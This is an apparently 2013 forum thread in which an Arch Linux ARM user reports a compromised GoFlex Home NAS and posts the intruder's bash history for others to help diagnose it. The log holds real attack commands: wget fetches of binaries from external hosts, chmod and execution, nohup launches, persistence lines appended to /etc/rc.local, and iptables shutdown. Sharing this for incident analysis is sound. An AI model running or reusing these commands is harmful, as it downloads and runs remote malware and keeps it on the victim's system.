Suspected rootkit

This forum is for Marvell Kirkwood devices such as the GoFlex Home/Net, PogoPlug v1/v2, SheevaPlug, and ZyXEL devices.

Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 5:38 am

I was dabbling in SSH with the GFH home today when I noticed a dead.letter file in my home directory.

After reviewing the file in nano, I discovered some disturbing entries. One such entry is provided below:
Date: Fri, 16 Aug 2013 00:53:45 -0400
To: dracula22ro@yahoo.com
Subject: rootkit
User-Agent: Heirloom mailx 12.5 7/5/10
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


I suspect my NAS has been compromised. Is it possible to reinstall the operating system without destroying data currently located on the SATA drive? I have three partitions, sda1 for root, sda2 for swap and sda3 for media. I'm not opposed to transferring files, wiping the device and transferring them back, but I'd like to save time.

What thoughts do you guys have?
jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 6:02 am

Some more digging has confirmed someone has been messing around. Not sure what value they've gleaned. This is my first experience of a security breach and is a lesson hard learned. I'm going to transfer my things this evening and perform a reinstallation tomorrow.

For whoever is interested, I'd be happy to post the .bash_log or any other files. Whatever would help me help myself.
jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 6:13 am

jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby pepedog » Tue Dec 03, 2013 8:31 am

It would be nice to know how they got in
pepedog
Developer
 
Posts: 2415
Joined: Mon Jun 07, 2010 3:30 pm
Location: London UK

Re: Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 3:07 pm

I suspect a weak password on my behalf. The alarmnas was internet facing and I could have used a much longer password. I could be wrong, but I'm also not sure if I could have used an SSH key. If possible, I'll be using one once I get things setup again.

Here are some relevant snippets from the bash log. Tell me what else I can provide to give you more info. I haven't wiped the drive yet and am not in a hurry to do so. Whatever recon we can do on it would be a good exercise for me. I did discover a simple IRC bot not so well hidden in the home directory.

w
uname -a
cat /etc/hosts
w
ps -x
wget
cd /usr
mkdir news
cd news
pwd
wget http://download.fioriginal.ro/cs/hldsupdatetool.bin
cat /proc/cpuinfo
chmod +x hldsupdatetool.bin
./hldsupdatetool.bin
cd ..
rm -rf news/
perl
w
ls
ifconfig
uname -a
cat /etc/issue
make
yum
apt-get
exit
cd /usr/sbin
w
wget http://download.microsoft.com/download/ ... W2Ksp3.exe
rm -rf W2Ksp3.exe
wget http://init.allalla.com/demon.jpg
tar -xzvf demon.jpg
cd .rc
./setup
/sbin/ifconfig
kill -9 -1
w
hsitory
history
cat /proc/cpuinfo
ls
clear
ssh root@192.168.1.2
clear
ping 192.168.1.2
clear
exit
top
stop
htop
uiry into the Cause of the Wealth of Nations (1776) and The Theory of Moral Sentiments (1759)
sudo aptitude install netatalk
pacman -S install netatalk
pacman -Sy netatalk dbus avahie-daemon
pacman -Sy netatalk dbus avahi-daemon
pacman -Sy netatalk dbus avahi-daemon
pacman help
pacman -h
pacman -U
pacman --upgrade
pacman -h
pacman -Sy netatalk dbus avahi
adduser timemachine
cd /etc
ls
nano afp.conf
nano afp.conf
pacman restart netstat
pacman -h
restart netstat
restart netatalk
cd
/etc/init.d/netatalk restart
free -m
ifconfig
ifconfig
ifconfig
ps axu
uname -a
w

...
jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 3:07 pm

continued

wget http://198.100.112.171:4234/http
chmod 0777 http
./http &
rm -rf http
htop
restart transmission
pacman -help
systemctl status transmission
systemctl restart transmission
systemctl status transmission
crontab -e
/etc/init.d/iptables stop
cd /etc
cd /etc;wget http://115.239.225.232:8080/cupsdd
cd /etc;wget http://115.239.225.232:8080/ksapd
cd /etc;wget http://115.239.225.232:8080/kysapd
cd /etc;wget http://115.239.225.232:8080/qqf
chmod 7777 /etc/cupsdd
chmod 7777 /etc/ksapd
chmod 7777 /etc/kysapd
chmod 7777 /etc/qqf
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./qqf
echo "nohup /etc/cupsdd > /dev/null 2>&1&" >> /etc/rc.local
echo "cd /etc;./ksapd" >> /etc/rc.local
echo "cd /etc;./kysapd" >> /etc/rc.local
w
ls
perl
cat /proc/cpuinfo
uname -a
ifconfig
netstat -an
uname -a
getconf LONG_BI
init 0
ifconfig
wget
cat /proc/cpuinfo
wget http://download.microsoft.com/download/ ... W2Ksp3.exe
uname -a
ifconfig
ifconfig
netstat -an
getconf LONG_BIT
wget http://122.224.32.32:22/udisks-daemoe
/etc/init.d/iptables stop
nohup /etc/udisks-daemoe > /dev/null 2>&1 &
ps -d
w
uname -a
passwd
cat /etc/issue
cat /proc/cpuinfo
perl
apt-get
jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby WarheadsSE » Tue Dec 03, 2013 3:33 pm

I strongly suggest a pastie, sprunge, ix, etc.
Core Developer
Remember: Arch Linux ARM is entirely community donation supported!
WarheadsSE
Developer
 
Posts: 6327
Joined: Mon Oct 18, 2010 2:12 pm

Re: Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 3:42 pm

So this issue has drawn some attention to other (seeming) issues with the GFH. I'm concerned that there may be some issues related to my UBoot/Ubit. Alternately, it could be an issue related to my understanding of Uboot/Ubit.

When I boot my GFH without a SATA or USB drive plugged in, it results in a blinking orange light. I was under the impression that an environment, however small, would be launched and permit at least SSH. Is this behavior normal? Is the NAND on the device essentially useless other than to hold the 1M Ubit?

As I'm going through the reinstallation process, should I attempt to update some things as well?
jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby jcconnell » Tue Dec 03, 2013 3:49 pm

Pastie as requested. I'll continue to use it in the future and my apologies for inexperience. Can this be embedded?

http://pastie.org/8525739
jcconnell
 
Posts: 33
Joined: Thu May 02, 2013 1:10 am

Re: Suspected rootkit

Postby WarheadsSE » Tue Dec 03, 2013 3:59 pm

The link is here :P
Core Developer
Remember: Arch Linux ARM is entirely community donation supported!
WarheadsSE
Developer
 
Posts: 6327
Joined: Mon Oct 18, 2010 2:12 pm

Next

Return to Marvell Kirkwood

Who is online

Users browsing this forum: No registered users and 0 guests